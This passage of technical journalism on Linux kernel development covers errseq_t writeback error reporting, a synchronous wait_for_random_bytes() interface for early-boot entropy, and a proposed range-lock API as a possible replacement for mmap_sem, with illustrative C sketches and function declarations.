To get there, the patch set creates a new type (errseq_t) for the reporting of writeback errors. It is a 32-bit value with two separate fields: an error code (of the standard Unix variety) and a sequence counter. That counter tracks the number of times that an error has been reported in that particular errseq_t value; kernel code can remember the counter value of the last error reported to user space. If the counter increases on a future check, a new error has been encountered.
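The check-and-advance idea can be sketched in ordinary user-space C. The bit split and helper names below are assumptions for illustration; the real errseq_t implementation differs in detail:

```c
#include <errno.h>
#include <stdint.h>

/* Illustrative errseq sketch: low bits hold an errno, high bits a counter. */
typedef uint32_t errseq_t;

#define ERRSEQ_SHIFT 12                    /* errno fits in the low 12 bits */
#define ERRSEQ_MASK  ((1u << ERRSEQ_SHIFT) - 1)

/* Record a new writeback error: store the code and bump the counter. */
static errseq_t errseq_set(errseq_t old, int err)
{
    uint32_t counter = (old >> ERRSEQ_SHIFT) + 1;
    return (counter << ERRSEQ_SHIFT) | ((uint32_t)(-err) & ERRSEQ_MASK);
}

/* Report an error only if one occurred since *since last sampled it. */
static int errseq_check_and_advance(errseq_t cur, errseq_t *since)
{
    if (cur == *since)
        return 0;               /* nothing new to report */
    *since = cur;               /* remember what we reported */
    return -(int)(cur & ERRSEQ_MASK);
}
```

With this scheme, two file descriptors each holding their own "since" value will both see a given error exactly once, which is the per-descriptor fsync() behavior the patch set is after.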

The errseq_t variables are added to the address_space structure, which controls the mapping between pages in the page cache and those in persistent storage. The writeback process uses this structure to determine where dirty pages should be written, so it is a logical place to store error information. Meanwhile, any open file descriptor referring to a given file will include a pointer to that address_space structure, so this errseq_t value is visible (within the kernel) to all processes accessing the file. Each open file (tracked by struct file) gains a new f_wb_err field to remember the sequence number of the last reported error.

Storing that value in the file structure has an important benefit: it makes it possible to report a writeback error exactly once to every process that calls fsync() on that file, regardless of when they make that call. In current kernels, only the first caller after an error occurs has a chance of seeing that error information. It would arguably be better to report the error only to the process that actually wrote the data that experienced the error, but tracking things at that level would be cumbersome and slow. By informing all processes, this mechanism ensures that the right process will get the news.

The final step is to get the low-level filesystem code to use the new reporting mechanism when something goes wrong. Rather than convert all filesystems at once, Layton chose to add a new filesystem-type flag (FS_WB_ERRSEQ) that can be set for filesystems that understand the new scheme. Code at the virtual filesystem layer can then react accordingly depending on whether the filesystem has been converted or not. The intent is to remove this flag and the associated mechanism once all in-tree filesystems have made the change.

The ideas behind this patch set were discussed at the 2017 Linux Storage, Filesystem, and Memory-Management Summit in March; the patches themselves have been through five public revisions since then. There is a reasonable chance that they are approaching a sort of final state where they can be considered for merging in an upcoming development cycle. The result will not be perfect writeback error reporting, but it should be significantly better than what the kernel offers now.

Comments (39 posted)

Many bytes have been expended over the years discussing the virtues of the kernel's random number generation subsystem. One of the biggest recurring concerns has to do with systems that are unable to obtain sufficient entropy during the boot process to meet early demands for random data. The latest discussion on this topic got off to a bit of a rough start, but it may lead to an incremental improvement in this area.

Jason Donenfeld started the thread with a complaint that /dev/urandom will, when read from user space, return data even if the kernel's internal entropy pool has not yet been properly seeded. In such a case, it is theoretically possible for an attacker to predict the not-so-random data that will be returned. He asserted that /dev/urandom should simply block until the entropy pool is ready, and dismissed the reasoning behind the current behavior: "Yes, yes, you have arguments for why you're keeping this pathological, but you're still wrong, and this api is still a bug."

Bug or not, as Ted Ts'o pointed out, making /dev/urandom block causes distributions like Ubuntu and OpenWrt to fail to boot. That sort of behavioral change is typically called a "regression", and regressions of this sort are not normally allowed. So /dev/urandom will retain its current behavior. But that isn't the point Donenfeld was really trying to address anyway. The real issue, as it turns out, has to do with getting random data from within the kernel instead of from user space. That can be done with a call to:

void get_random_bytes(void *buf, int nbytes);

This function will place nbytes of random data into the buffer pointed to by buf; it will do so regardless of whether the entropy pool is fully initialized. So, once again, it is possible to get data that is not truly random. Since this function is called from inside the kernel, those calls can happen early in the boot process, so the chance of encountering an insufficiently random entropy pool is relatively high.

This problem is not unknown to the kernel development community, of course. In 2015, Stephan Mueller proposed the addition of a version of get_random_bytes() that would block until the entropy pool is ready, should that be necessary. That idea ran into trouble, though, when Herbert Xu pointed out that it could lead to deadlocks — just the sort of random event that tends not to be of interest. So, instead, a callback interface was created. Kernel code that wants to ensure that it gets good random data starts by creating a callback function and placing a pointer to that function in a random_ready_callback structure:

struct random_ready_callback {
    struct list_head list;
    void (*func)(struct random_ready_callback *rdy);
    struct module *owner;
};

That structure is then passed to add_random_ready_callback() :

int add_random_ready_callback(struct random_ready_callback *rdy);

When the random-number subsystem is ready, the given callback function will be called. By adding some more structure (most likely using a completion), the calling code can create something that looks like a synchronous function to get random data.
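To see how the pieces fit together, here is a user-space sketch of the callback registration and the completion-style flag a caller would wait on. The list handling and return values here are simplified assumptions; the kernel version uses a list_head, takes a lock, and has its own return conventions:

```c
#include <stdbool.h>
#include <stddef.h>

/* User-space sketch of the callback list plus a completion-style flag. */
struct random_ready_callback {
    struct random_ready_callback *next;
    void (*func)(struct random_ready_callback *rdy);
};

static struct random_ready_callback *ready_list;
static bool pool_ready;

/* Analogue of add_random_ready_callback(): refuse if already ready. */
static int add_random_ready_callback(struct random_ready_callback *rdy)
{
    if (pool_ready)
        return -1;      /* simplified; the caller can just proceed */
    rdy->next = ready_list;
    ready_list = rdy;
    return 0;
}

/* Called once the pool is seeded: run every registered callback. */
static void mark_pool_ready(void)
{
    pool_ready = true;
    for (struct random_ready_callback *c = ready_list; c; c = c->next)
        c->func(c);
}

/* A "completion" built from the callback: the callback just sets a flag. */
static bool done;
static void my_ready_cb(struct random_ready_callback *rdy)
{
    (void)rdy;
    done = true;        /* a kernel caller would call complete() here */
}
```

A caller registers my_ready_cb, then sleeps on the flag (in the kernel, on a completion); once mark_pool_ready() fires, the wait ends and random data can be fetched safely.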

As Donenfeld pointed out, this interface is a little bit on the cumbersome side, which may have something to do with the fact that it has exactly one call site in the kernel. He suggested that it might make sense to add a synchronous interface that could be used in at least some situations; that would make it possible to fix some places in the kernel that are at risk of using nonrandom data. Ts'o agreed that this approach might make sense:

Or maybe we can then help figure out what percentage of the callsites can be fixed with a synchronous interface, and fix some number of them just to demonstrate that the synchronous interface does work well.

The end result was a patch series from Donenfeld adding a new function:

int wait_for_random_bytes(bool is_interruptable, unsigned long timeout);

As its name might suggest, wait_for_random_bytes() will wait until random data is available. If is_interruptable is set, the function will return early (with an error code) should the calling process receive a signal. The timeout parameter can be used to put an upper bound on how long the call will wait. This functionality turned out to be a bit more than was needed, though; in particular, Ts'o expressed skepticism about the timeout idea, asking: "If you are using get_random_bytes() for security reasons, does the security reason go away after 15 seconds?" The third version of the patch set removed all of the arguments to wait_for_random_bytes(), making all waits interruptible with no timeout.

The patch series then adds a set of convenience functions to combine waiting and actually getting the random data, including:

static inline int get_random_bytes_wait(void *buf, int nbytes);
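The wrapper simply chains the argument-free wait (as in the third revision) onto the existing getter. A user-space sketch of the pattern, in which the pool flag, the error choice, and the fake fill are all stand-ins rather than kernel code:

```c
#include <errno.h>
#include <string.h>

/* Stand-ins for the kernel's pool state, waiter, and getter. */
static int pool_ready_flag;

static int wait_for_random_bytes(void)
{
    /* Pretend a not-yet-ready wait was interrupted by a signal. */
    return pool_ready_flag ? 0 : -EINTR;
}

static void get_random_bytes(void *buf, int nbytes)
{
    memset(buf, 0xa5, nbytes);  /* fake "random" fill for the sketch */
}

/* The convenience pattern: fail the wait, or wait and then fill. */
static int get_random_bytes_wait(void *buf, int nbytes)
{
    int ret = wait_for_random_bytes();
    if (ret)
        return ret;
    get_random_bytes(buf, nbytes);
    return 0;
}
```

Callers that can sleep use the combined form and get an error if the wait is interrupted; callers that cannot sleep keep using plain get_random_bytes() and accept the early-boot risk.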

Most of the comments on the patch set at this point are about relatively minor issues. So chances are that some version of this patch set will find its way into the kernel eventually, with the result, hopefully, that there will be a reduced chance of kernel code using insufficiently random data. But there is one other aspect of this situation that seems entirely deterministic: the arguments about the quality of the kernel's random-number subsystem are far from finished. That is, after all, the fundamental problem with random numbers: it is difficult to be sure that they are truly random.

Comments (39 posted)

The kernel uses a variety of lock types internally, but they all share one feature: they are a simple either/or proposition. When a lock is obtained for a resource, the entire resource is locked, even if exclusive access is only needed for a part of it. Many resources managed by the kernel are complex entities for which it may make sense to lock only a smaller part; files (consisting of a range of bytes) or a process's address space are examples of this type of resource. For years, kernel developers have talked about adding "range locks" — locks that would only apply to a portion of a given resource — as a way of increasing concurrency. Work has progressed in that area, and range locks may soon be added to the kernel's locking toolkit.

Jan Kara posted a range-locking mechanism in 2013, but that work stalled and never made it into the mainline. More recently, Davidlohr Bueso has picked up that work and extended it. The result is a new form of reader/writer lock — a lock, in other words, that distinguishes between read-only and write access to a resource. Reader/writer locks can increase concurrency in settings where the protected resource is normally accessed by readers, since all readers can run simultaneously. Whenever a writer comes along, though, it must have exclusive access to the resource. Balancing access between readers and writers can be a tricky business where the wrong decisions can lead to starvation, unfairness, or poor concurrency.

Since range locks only cover part of a resource, there can be many of them active at once, covering separate parts of the resource as a whole. For a given resource, the data structure that describes all of the known range locks, including those that are waiting for the needed range to become available, is a "range lock tree", represented by struct range_lock_tree. This "tree" is the lock that protects the resource as a whole; it will typically be located in or near the relevant data structure where one would otherwise find a simpler lock. Thus, a range-locking implementation will tend to start with something like:

#include <linux/range_lock.h>

DEFINE_RANGE_LOCK_TREE(my_tree);

Given the range_lock_tree structure to protect the resource, a thread needing access to a portion of that resource will need to acquire a lock on the range of interest. A lock on a specific range (whether granted or not) is represented by struct range_lock. It is possible to declare and initialize a range lock statically with either of:

DEFINE_RANGE_LOCK(my_lock, start, end);
DEFINE_RANGE_LOCK_FULL(name);

The second variant above will describe a lock on the entire range. It is also possible to initialize a range_lock structure at run time with either of:

void range_lock_init(struct range_lock *lock, unsigned long start,
                     unsigned long end);
void range_lock_init_full(struct range_lock *lock);

Actually acquiring a range lock requires calling one of a large set of primitives. In the simplest case, a call to range_read_lock() will acquire a read lock on the indicated range, blocking if necessary to wait for the range to become available:

void range_read_lock(struct range_lock_tree *tree, struct range_lock *lock);

The lock for the entire resource is provided as tree, while lock describes the region that is to be locked. Like most sleeping lock primitives, range_read_lock() will go into a non-interruptible sleep if it must wait. That behavior can be changed by calling one of the other locking functions:

int range_read_lock_interruptible(struct range_lock_tree *tree,
                                  struct range_lock *lock);
int range_read_lock_killable(struct range_lock_tree *tree,
                             struct range_lock *lock);
int range_read_trylock(struct range_lock_tree *tree, struct range_lock *lock);

In any case, a read lock that has been granted must eventually be released with:

void range_read_unlock(struct range_lock_tree *tree, struct range_lock *lock);

If, instead, the range must be written to, a write lock should be obtained with one of:

void range_write_lock(struct range_lock_tree *tree, struct range_lock *lock);
int range_write_lock_interruptible(struct range_lock_tree *tree,
                                   struct range_lock *lock);
int range_write_lock_killable(struct range_lock_tree *tree,
                              struct range_lock *lock);
int range_write_trylock(struct range_lock_tree *tree, struct range_lock *lock);

A call to range_write_unlock() will release a write lock. It is also possible to turn a write lock into a read lock with:

void range_downgrade_write(struct range_lock_tree *tree, struct range_lock *lock);

The implementation does not give any particular priority to either readers or writers. If a writer is waiting for a given range, a reader that arrives later requesting an intersecting range will wait behind the writer, even if other readers are active in that range at the time. The result is, possibly, less concurrency than might otherwise be possible, but this approach also ensures that writers will not be starved for access.
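The conflict rule above depends on nothing more exotic than an interval-intersection test: two inclusive ranges overlap exactly when each starts at or before the other ends. A minimal sketch, with hypothetical names rather than the patch set's actual code:

```c
#include <stdbool.h>

/* An inclusive [start, end] range, as a range lock covers. */
struct range {
    unsigned long start;
    unsigned long end;
};

/* Two inclusive ranges conflict iff each begins before the other ends. */
static bool ranges_intersect(const struct range *a, const struct range *b)
{
    return a->start <= b->end && b->start <= a->end;
}
```

So a reader requesting [100, 200] would queue behind a waiting writer on [150, 300], while a reader requesting [0, 50] could proceed immediately.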

This patch set has been through a few revisions and does not seem to be generating much more in the way of comments, so it might be about ready to go. The first user is the Lustre filesystem, which is already using a variant of Kara's range-lock implementation internally to control access to ranges of files. But there is a potentially more interesting user waiting in the wings: using range locks as a replacement for mmap_sem.

The reader/writer semaphore known as mmap_sem is one of the most intractable contention points in the memory-management subsystem. It protects a process's memory map, including, to an extent, the page tables. Many performance-sensitive operations, such as handling page faults, must acquire mmap_sem with the result that, on many workloads, contention for mmap_sem is a significant performance bottleneck. Protecting a process's virtual address space would appear to be a good application for a range lock. Most of the time, a change to the address space does not affect the entire space; it is, instead, focused on a particular set of addresses. Using range locks would allow more operations on a given address space to proceed concurrently, reducing contention and improving performance.

The patch set (posted by Laurent Dufour) does not yet achieve that goal; instead, the entire range is locked every time. Thus, with these patches, a range lock replaces mmap_sem without really changing how things work. Restricting the change in this way allows the developers to be sure that the switch to a range lock has not introduced any bugs of its own. Once confidence in that change exists, developers will be able to start reducing the ranges to what is actually needed.

These changes will need to be made with care, especially since what is being protected by mmap_sem is not always clear. But, given enough development cycles, the mmap_sem bottleneck should slowly dissolve away, leaving us with a faster, more concurrent memory-management subsystem. Some improvements are worth waiting for.

Comments (10 posted)